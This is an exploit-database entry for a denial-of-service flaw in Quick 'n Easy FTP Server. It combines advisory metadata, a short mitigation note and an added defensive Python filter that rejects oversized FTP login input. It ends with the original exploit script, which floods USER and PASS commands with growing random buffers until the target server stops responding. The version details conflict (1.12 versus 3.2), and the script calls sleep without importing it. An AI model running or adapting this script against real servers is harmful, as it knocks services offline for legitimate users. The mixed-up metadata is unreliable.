Vendor: Quick 'n Easy FTP Server
By: clshack
CVSS: 7.5 (HIGH)
Type: DOS
CWE: 400
Product Name: Quick 'n Easy FTP Server
Affected Version From: 1.12
Affected Version To: 1.12
Patch Exists: NO
Related CWE:
CPE: cpe:2.3:a:pablosoftwaresolutions:quick_'n_easy_ftp_server:3.2:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2011

DOS LOGIN Quick ‘n Easy FTP Server 3.2

This exploit allows an attacker to perform a Denial of Service (DOS) attack by sending a large buffer of random characters as the username and password to the Quick 'n Easy FTP Server 3.2. This causes the server to become unresponsive and deny service to legitimate users.

Mitigation:

Update to a patched version of the Quick 'n Easy FTP Server software that fixes the DOS vulnerability.
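
Until a fixed build is deployed, the oversized USER/PASS input described above can be rejected before it reaches the server. The following is an added example, not part of the original advisory or the vendor's code: a length and character check for client-to-server FTP control bytes, as a filtering proxy or sensor might apply it. The class name FtpLoginGuard and the limits MAX_LINE and MAX_CRED are assumptions chosen for illustration.

```python
import re

# Assumed policy limits (not from the advisory); tune to your user base.
MAX_LINE = 512   # bytes allowed in one control-channel command line
MAX_CRED = 128   # bytes allowed in a USER or PASS argument
PRINTABLE = re.compile(rb"[\x20-\x7e]*")


class FtpLoginGuard:
    """Hypothetical filter for client-to-server FTP control bytes."""

    def __init__(self):
        self._buf = b""
        self.alerts = []  # (reason, observed_length) tuples

    def feed(self, chunk):
        """Consume one recv() chunk; False means drop the session."""
        self._buf += chunk
        while b"\n" in self._buf:
            line, self._buf = self._buf.split(b"\n", 1)
            if not self._check(line.rstrip(b"\r")):
                return False
        # An unterminated line past the limit is dropped, not buffered.
        if len(self._buf) > MAX_LINE:
            return self._alert("line-too-long", len(self._buf))
        return True

    def _alert(self, reason, size):
        self.alerts.append((reason, size))
        self._buf = b""
        return False

    def _check(self, line):
        if len(line) > MAX_LINE:
            return self._alert("line-too-long", len(line))
        verb, _, arg = line.partition(b" ")
        name = verb.upper()
        if name in (b"USER", b"PASS"):
            if len(arg) > MAX_CRED:
                return self._alert("oversized-" + name.decode().lower(), len(arg))
            if not PRINTABLE.fullmatch(arg):
                return self._alert("non-printable-" + name.decode().lower(), len(arg))
        return True


if __name__ == "__main__":
    guard = FtpLoginGuard()  # constructed sample input below
    print(guard.feed(b"USER alice\r\nPASS s3cret\r\n"), guard.alerts)
    print(guard.feed(b"USER " + b"A" * 300 + b"\r\n"), guard.alerts)
```

The alerts list doubles as a detection signal: repeated oversized-user or line-too-long entries from one source match the pattern this entry describes.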

Exploit-DB raw data:

# Exploit Title:[DOS LOGIN]  Quick 'n Easy FTP Server 3.2
# Date:28/2/2011
# Author: clshack
# Software Link: http://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html<http://downstairs.dnsalias.net/homeftpserver.html>
# Version:1.12
# Tested on: windows xp sp3 en
# CVE :

#!/usr/bin/python
from ftplib import *
import random
import socket
def ping(host,port):
    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
        connect=s.connect((host,port));
    except Exception ,e :
        print e
        return 0;
    s.close();
    return 1;

host = "192.168.1.155"
port = 21
buffer="";
while(len(buffer)<200000):
    buffer+=chr(int(random.uniform(0,255)))*2+"?";
    try:
        ftp=FTP();
        ftp.connect(host,port);
        ftp.sendcmd("USER "+buffer)
        ftp.sendcmd("PASS "+buffer)
        ftp.quit();
        ftp.close();
        sleep(int(random.uniform(0,2)))
    except Exception, e:
        print e
    if not ping(host,port):
        print "Dos in Login credentials \n"
        exit(-1)

Twitter:clshackblog